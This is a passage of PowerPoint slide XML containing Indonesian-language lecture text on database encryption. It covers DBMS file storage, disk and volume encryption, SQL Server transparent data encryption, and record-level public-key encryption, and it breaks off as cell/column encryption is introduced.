            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhirnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> volume, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aksesnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data (DBMS) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Structured Query Language (SQL). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, basis data di-host di server dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>File-file yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendasarinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> volume yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di server. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buruk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh DBMS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh plug-in. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> granular yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> DBMS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>opsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> DBMS SQL Server Microsoft, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tipikal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Tingkat Basis Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditransfer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transparan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (TDE) di SQL Server. Halaman </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sarana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kueri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendasarinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di disk, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencurian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> media yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendasarinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> log yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Tingkat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Catatan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Banyak database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>boleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh administrator database. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kolom</a:t>
            </a:r>
            <a:r>
